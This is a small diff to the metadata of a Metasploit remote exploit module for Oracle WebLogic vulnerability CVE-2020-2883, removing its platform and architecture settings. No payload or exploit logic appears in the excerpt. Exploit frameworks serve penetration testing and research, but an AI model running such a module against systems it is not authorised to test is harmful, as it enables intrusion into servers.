@@ -38,8 +38,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2020-2883' ],
           [ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ],
         ],
-        'Platform' => %w[unix linux win],
-        'Arch' => [ ARCH_X86, ARCH_X64 ],
         'Privileged' => false,
         'Targets' => [
           [
